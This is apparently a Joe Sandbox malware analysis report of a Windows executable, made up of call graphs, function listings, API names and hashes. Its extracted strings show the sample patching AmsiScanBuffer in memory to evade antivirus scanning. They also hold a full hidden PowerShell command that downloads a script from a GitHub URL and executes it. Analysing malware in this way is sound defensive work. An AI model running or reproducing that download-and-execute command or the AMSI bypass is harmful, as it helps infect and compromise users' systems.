7ff7ea0288d8 7209->7210 7211 7ff7ea02892c 7209->7211 7214 7ff7ea0288ed 7210->7214 7210->7216 7217 7ff7ea0286b8 __free_lconv_num 11 API calls 7210->7217 7212 7ff7ea02a080 WideCharToMultiByte 7211->7212 7224 7ff7ea028950 7212->7224 7213->7216 7218 7ff7ea0284ec 12 API calls 7214->7218 7215 7ff7ea028957 GetLastError 7219 7ff7ea028594 11 API calls 7215->7219 7216->7166 7217->7214 7218->7216 7222 7ff7ea028964 7219->7222 7220 7ff7ea028994 7220->7216 7221 7ff7ea02a080 WideCharToMultiByte 7220->7221 7225 7ff7ea0289e0 7221->7225 7226 7ff7ea028620 _set_fmode 11 API calls 7222->7226 7223 7ff7ea028988 7228 7ff7ea0284ec 12 API calls 7223->7228 7224->7215 7224->7220 7224->7223 7227 7ff7ea0286b8 __free_lconv_num 11 API calls 7224->7227 7225->7215 7225->7216 7226->7216 7227->7223 7228->7220 7230 7ff7ea02824c _set_fmode 11 API calls 7229->7230 7231 7ff7ea0285a1 __free_lconv_num 7230->7231 7232 7ff7ea02824c _set_fmode 11 API calls 7231->7232 7233 7ff7ea0285c3 7232->7233 7233->7204 6721 7ff7ea022978 6722 7ff7ea0229ac 6721->6722 6723 7ff7ea022990 6721->6723 6723->6722 6730 7ff7ea0233b8 6723->6730 6728 7ff7ea027b34 47 API calls 6729 7ff7ea0229d2 6728->6729 6731 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6730->6731 6732 7ff7ea0229be 6731->6732 6733 7ff7ea0233cc 6732->6733 6734 7ff7ea023740 __CxxCallCatchBlock 58 API calls 6733->6734 6735 7ff7ea0229ca 6734->6735 6735->6728 7622 7ff7ea0220fc 7623 7ff7ea022914 GetModuleHandleW 7622->7623 7624 7ff7ea022103 __GetCurrentState 7623->7624 7362 7ff7ea02e47b 7364 7ff7ea02e4bb 7362->7364 7365 7ff7ea02e720 7362->7365 7363 7ff7ea02e716 7364->7365 7366 7ff7ea02e4ef 7364->7366 7367 7ff7ea02e702 7364->7367 7365->7363 7369 7ff7ea02f230 _log10_special 20 API calls 7365->7369 7370 7ff7ea02f230 7367->7370 7369->7363 7373 7ff7ea02f250 7370->7373 7374 7ff7ea02f26a 7373->7374 7375 7ff7ea02f24b 7374->7375 7377 7ff7ea02f090 7374->7377 7375->7363 7378 7ff7ea02f0d0 _log10_special 7377->7378 7381 7ff7ea02f13c _log10_special 7378->7381 7388 7ff7ea02f350 7378->7388 7380 7ff7ea02f179 7395 7ff7ea02f680 7380->7395 7381->7380 7383 7ff7ea02f149 7381->7383 7391 7ff7ea02ef6c 7383->7391 7385 7ff7ea02f177 _log10_special 7386 7ff7ea021e60 _log10_special 8 API calls 7385->7386 7387 7ff7ea02f1a1 7386->7387 7387->7375 7401 7ff7ea02f378 7388->7401 7392 7ff7ea02efb0 _log10_special 7391->7392 7393 7ff7ea02efc5 7392->7393 7394 7ff7ea02f680 _log10_special 11 API calls 7392->7394 7393->7385 7394->7393 7396 7ff7ea02f689 7395->7396 7397 7ff7ea02f6a0 7395->7397 7399 7ff7ea02f698 7396->7399 7400 7ff7ea028620 _set_fmode 11 API calls 7396->7400 7398 7ff7ea028620 _set_fmode 11 API calls 7397->7398 7398->7399 7399->7385 7400->7399 7402 7ff7ea02f3b7 _raise_exc _clrfp 7401->7402 7403 7ff7ea02f5cc RaiseException 7402->7403 7404 7ff7ea02f372 7403->7404 7404->7381 7234 7ff7ea021000 7235 7ff7ea0231d0 __std_exception_copy 49 API calls 7234->7235 7236 7ff7ea021029 7235->7236 6736 7ff7ea02c180 6737 7ff7ea02c1ad 6736->6737 6738 7ff7ea028620 _set_fmode 11 API calls 6737->6738 6743 7ff7ea02c1c2 6737->6743 6739 7ff7ea02c1b7 6738->6739 6740 7ff7ea0266bc _invalid_parameter_noinfo 47 API calls 6739->6740 6740->6743 6741 7ff7ea021e60 _log10_special 8 API calls 6742 7ff7ea02c580 6741->6742 6743->6741 7405 7ff7ea02c680 7406 7ff7ea02c69f 7405->7406 7407 7ff7ea02c718 7406->7407 7410 7ff7ea02c6af 7406->7410 7413 7ff7ea022264 7407->7413 7411 7ff7ea021e60 _log10_special 8 API calls 7410->7411 7412 7ff7ea02c70e 7411->7412 7416 7ff7ea022278 IsProcessorFeaturePresent 7413->7416 7417 7ff7ea02228f 7416->7417 7422 7ff7ea022314 RtlCaptureContext RtlLookupFunctionEntry 7417->7422 7423 7ff7ea022344 RtlVirtualUnwind 7422->7423 7424 7ff7ea0222a3 7422->7424 7423->7424 7425 7ff7ea02215c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7424->7425

                                                                          Executed Functions

                                                                          Function 00007FF7EA0211C0 Relevance: 40.7, APIs: 14, Strings: 9, Instructions: 430libraryprocessloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 7ff7ea0211c0-7ff7ea0213d0 call 7ff7ea021920 MultiByteToWideChar call 7ff7ea021a80 MultiByteToWideChar LoadLibraryExW call 7ff7ea021920 7 7ff7ea0213d2-7ff7ea0213e0 0->7 8 7ff7ea021401-7ff7ea02141f call 7ff7ea021bb0 0->8 9 7ff7ea0213e2 7->9 10 7ff7ea0213e5-7ff7ea0213ff call 7ff7ea02fe30 7->10 15 7ff7ea021422-7ff7ea021464 8->15 9->10 10->15 16 7ff7ea02149d-7ff7ea0214b9 call 7ff7ea021bb0 15->16 17 7ff7ea021466-7ff7ea02149b call 7ff7ea02fe30 15->17 22 7ff7ea0214bd-7ff7ea0214dc 16->22 17->22 23 7ff7ea0214de-7ff7ea0214f0 22->23 24 7ff7ea021510-7ff7ea02152b 22->24 25 7ff7ea02150b call 7ff7ea021ebc 23->25 26 7ff7ea0214f2-7ff7ea021505 23->26 27 7ff7ea02152d-7ff7ea02153f 24->27 28 7ff7ea02155f-7ff7ea021651 GetProcAddress GetCurrentProcess WriteProcessMemory SleepEx CreateProcessA 24->28 25->24 26->25 29 7ff7ea021913-7ff7ea021918 call 7ff7ea0266dc 26->29 31 7ff7ea02155a call 7ff7ea021ebc 27->31 32 7ff7ea021541-7ff7ea021554 27->32 33 7ff7ea021678-7ff7ea02168e MessageBoxA 28->33 34 7ff7ea021653-7ff7ea021676 WaitForSingleObject CloseHandle * 2 28->34 31->28 32->29 32->31 35 7ff7ea021694-7ff7ea0216a2 33->35 34->35 38 7ff7ea0216a4-7ff7ea0216b6 35->38 39 7ff7ea0216d6-7ff7ea0216e1 35->39 41 7ff7ea0216b8-7ff7ea0216cb 38->41 42 7ff7ea0216d1 call 7ff7ea021ebc 38->42 43 7ff7ea021714-7ff7ea02171f 39->43 44 7ff7ea0216e3-7ff7ea0216f4 39->44 41->42 45 7ff7ea02190d-7ff7ea021912 call 7ff7ea0266dc 41->45 42->39 49 7ff7ea021721-7ff7ea021735 43->49 50 7ff7ea021755-7ff7ea021759 43->50 47 7ff7ea02170f call 7ff7ea021ebc 44->47 48 7ff7ea0216f6-7ff7ea021709 44->48 45->29 47->43 48->45 48->47 55 7ff7ea021737-7ff7ea02174a 49->55 56 7ff7ea021750 call 7ff7ea021ebc 49->56 51 7ff7ea02175b-7ff7ea02176d 50->51 52 7ff7ea02178d-7ff7ea021791 50->52 57 7ff7ea021788 call 7ff7ea021ebc 51->57 58 7ff7ea02176f-7ff7ea021782 51->58 60 7ff7ea021793-7ff7ea0217a5 52->60 61 7ff7ea0217c5-7ff7ea0217cd 52->61 55->45 55->56 56->50 57->52 58->45 58->57 64 7ff7ea0217a7-7ff7ea0217ba 60->64 65 7ff7ea0217c0 call 7ff7ea021ebc 60->65 66 7ff7ea0217cf-7ff7ea0217e5 61->66 67 7ff7ea021805-7ff7ea02181f 61->67 64->45 64->65 65->61 71 7ff7ea0217e7-7ff7ea0217fa 66->71 72 7ff7ea021800 call 7ff7ea021ebc 66->72 68 7ff7ea021852-7ff7ea02186b 67->68 69 7ff7ea021821-7ff7ea021832 67->69 75 7ff7ea02189a-7ff7ea0218a2 68->75 76 7ff7ea02186d-7ff7ea02187e 68->76 73 7ff7ea02184d call 7ff7ea021ebc 69->73 74 7ff7ea021834-7ff7ea021847 69->74 71->45 71->72 72->67 73->68 74->45 74->73 81 7ff7ea0218d1-7ff7ea02190c call 7ff7ea021e60 75->81 82 7ff7ea0218a4-7ff7ea0218b5 75->82 79 7ff7ea021880-7ff7ea021893 76->79 80 7ff7ea021895 call 7ff7ea021ebc 76->80 79->45 79->80 80->75 84 7ff7ea0218b7-7ff7ea0218ca 82->84 85 7ff7ea0218cc call 7ff7ea021ebc 82->85 84->45 84->85 85->81
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: Process_invalid_parameter_noinfo_noreturn$ByteCharCloseHandleMultiWide$AddressConcurrency::cancel_current_taskCreateCurrentLibraryLoadMemoryMessageObjectProcSingleSleepWaitWrite
                                                                          • String ID: AmsiScanBuffer$Error$Failed to create process.$ams$anBuf$fer$i.dll$powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)"$siSc
                                                                          • API String ID: 3479162059-290396749
                                                                          • Opcode ID: d7b29b5f5fee5b7ec96a9fd973fe06499e66b6e7b58cf3ba6fb75891a3546755
                                                                          • Instruction ID: c46309ee55ff2a47ce9dbf78c3d7d026c898580de5b9f814aa66e910dbdf159b
                                                                          • Opcode Fuzzy Hash: d7b29b5f5fee5b7ec96a9fd973fe06499e66b6e7b58cf3ba6fb75891a3546755
                                                                          • Instruction Fuzzy Hash: 84229572E18B8685FB10DF64D8443AC7761FB497A8F504366DAAC07B9AEF78D184C321
                                                                          Function 00007FF7EA02B0D8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 7348f625054ab8bcd707b2469e6c6aea2445f2d121df6d14dca7bebcda2ebe27
                                                                          • Instruction ID: 901beeafc89baaf921515e3a9dcf51923b3ef59ebb63e4b72fb32b7e86eb52d8
                                                                          • Opcode Fuzzy Hash: 7348f625054ab8bcd707b2469e6c6aea2445f2d121df6d14dca7bebcda2ebe27
                                                                          • Instruction Fuzzy Hash: 6F41D231B19B0381FA16EB1699507B9A399BF4AB90FC84176DD1D47785FE3CE4098332
                                                                          Function 00007FF7EA021FD4 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 3251591375-0
                                                                          • Opcode ID: 5b8296b5d020f9003fc5c8adc8dfcb2d70eb87d388169637e8a203d8ddc243b2
                                                                          • Instruction ID: ec31fdbe35e153569a88c09d4f523026423c9d40f32fff727652d7abf27d853b
                                                                          • Opcode Fuzzy Hash: 5b8296b5d020f9003fc5c8adc8dfcb2d70eb87d388169637e8a203d8ddc243b2
                                                                          • Instruction Fuzzy Hash: 3C315011E0C34381FA65B7A5A5523F993919F59784FC440B7EA0E472D7FE3CA4098273
                                                                          Function 00007FF7EA0272C0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 8cca125ee007edf4a820fc2fc23bc9cf9c93093577fcd82e637b459671fd83a5
                                                                          • Instruction ID: 8c7e0774f71b4b68eaf61ff1927c6bc05c6c3734c8c992b309c51b2254d8fb69
                                                                          • Opcode Fuzzy Hash: 8cca125ee007edf4a820fc2fc23bc9cf9c93093577fcd82e637b459671fd83a5
                                                                          • Instruction Fuzzy Hash: FCD01C10F0870382FB183B301A893B993212F8C701B8018BAD80F02383EDBCA80D8232
                                                                          Function 00007FF7EA0271F1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                          • String ID:
                                                                          • API String ID: 3947729631-0
                                                                          • Opcode ID: 79e457cb8cf1577cab689f304d33f1789883641c835730ea0980301c81cd37cd
                                                                          • Instruction ID: a6b1afea2f3d3248b5d42e4e0101adbf07e2c7b8b3b6dd73a2aa5e96ea1e8e18
                                                                          • Opcode Fuzzy Hash: 79e457cb8cf1577cab689f304d33f1789883641c835730ea0980301c81cd37cd
                                                                          • Instruction Fuzzy Hash: E3212C32A057438AFB26AF64D4403AC77A4EB44718F940677E61D06FD6EF38D588CB61
                                                                          Function 00007FF7EA02A3CC Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 3215553584-0
                                                                          • Opcode ID: e495469f45ed96cce23e771b6e46bb6dd564c52813996d4319166329af59f4cf
                                                                          • Instruction ID: b43ea5b96791896f4129a0874fcffdca3dbfe12b434d4f5946c5eddbccb70c73
                                                                          • Opcode Fuzzy Hash: e495469f45ed96cce23e771b6e46bb6dd564c52813996d4319166329af59f4cf
                                                                          • Instruction Fuzzy Hash: 93116D32D08B4382F214AB14A44476AE7A4EB80744F9501B7E65D87A97EE3CE8149772
                                                                          Function 00007FF7EA02245C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7EA022470
                                                                            • Part of subcall function 00007FF7EA0236D4: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF7EA0236DC
                                                                            • Part of subcall function 00007FF7EA0236D4: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF7EA0236E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                          • String ID:
                                                                          • API String ID: 1208906642-0
                                                                          • Opcode ID: 8c319402ea9a0b8132f41284b8ac78946d4f2898a35466c4132d851a6f19d243
                                                                          • Instruction ID: bf73caaf4a16095a1627f5f2d0315fbb7110c94ed77b097d4d5a3994a66555a3
                                                                          • Opcode Fuzzy Hash: 8c319402ea9a0b8132f41284b8ac78946d4f2898a35466c4132d851a6f19d243
                                                                          • Instruction Fuzzy Hash: ACE0B650E0D34385FD6936A125423B9C3441F29344FC050FBD85E521D3BE3E654A1233
                                                                          Function 00007FF7EA028640 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF7EA0282AE,?,?,?,00007FF7EA028629,?,?,?,?,00007FF7EA0286EC), ref: 00007FF7EA028695
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 4292702814-0
                                                                          • Opcode ID: 8f14566fc9b4ea454ea4b72f674db0a44ad523e3ab09d3503c3e03184f00f539
                                                                          • Instruction ID: 9c389177e8658263cf7f0c6000e50dc70d7bdfbf20241b6d6cfb1de17d582f92
                                                                          • Opcode Fuzzy Hash: 8f14566fc9b4ea454ea4b72f674db0a44ad523e3ab09d3503c3e03184f00f539
                                                                          • Instruction Fuzzy Hash: 6FF03718B0930784FE58B6A299583B593805F88B80FDC04B2C90E96383FE7CE4888232

                                                                          Non-executed Functions

                                                                          Function 00007FF7EA022788 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: adb691d6ef64bec275dc11d89879b32cf7de62b67ca29f6eab69e9d4913c8c87
                                                                          • Instruction ID: 06aa1355e94a718b2504f4c59739c12c4a0f8230e1a39968f23ab9b1c5cf3983
                                                                          • Opcode Fuzzy Hash: adb691d6ef64bec275dc11d89879b32cf7de62b67ca29f6eab69e9d4913c8c87
                                                                          • Instruction Fuzzy Hash: FB313372609B8285FB609F60E8807EDB364F748744F44407BDA4D47B99EF78D548C721
                                                                          Function 00007FF7EA0263F0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 032cf48311e37a1ed79d3eb5693dd78ac14fc4b8a2c7b28f5f10b4e86fe54901
                                                                          • Instruction ID: c37eec96f52abdf3d121b2b77c688e389c5886995ad7320d26417492f998800a
                                                                          • Opcode Fuzzy Hash: 032cf48311e37a1ed79d3eb5693dd78ac14fc4b8a2c7b28f5f10b4e86fe54901
                                                                          • Instruction Fuzzy Hash: 46317832A08B8285EB60DF25E8403ADB3A4FB89754F900177EA9D43755EF3CD159C711
                                                                          Function 00007FF7EA022660 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 5b2659f078486328cf6791bc43bc743369c1ecc96c6d9021afdf357ff2fb77f5
                                                                          • Instruction ID: 04112806047d4b0cb2e10a4f89788b5996dac1ec84c61e683bdf6a59cb11bb0d
                                                                          • Opcode Fuzzy Hash: 5b2659f078486328cf6791bc43bc743369c1ecc96c6d9021afdf357ff2fb77f5
                                                                          • Instruction Fuzzy Hash: DE111822F54B068AFB00AB60E9543B873A4FB19758F840A32DA6D867A4EF78D1588351
                                                                          Function 00007FF7EA02F378 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise_clrfp
                                                                          • String ID:
                                                                          • API String ID: 15204871-0
                                                                          • Opcode ID: 2045596ada029767b90017b957664b0b71c7a256b325aa916a96e60a40104743
                                                                          • Instruction ID: 1c562d9005acc667ad911c58f1868941f8f9a8c4a5144bba9db9c16c4f645b53
                                                                          • Opcode Fuzzy Hash: 2045596ada029767b90017b957664b0b71c7a256b325aa916a96e60a40104743
                                                                          • Instruction Fuzzy Hash: 66B1BD73A00B8A8BEB15CF29C48636C7BE0F741B88F148966DB5D837A5CB39D461C721
                                                                          Function 00007FF7EA028C54 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
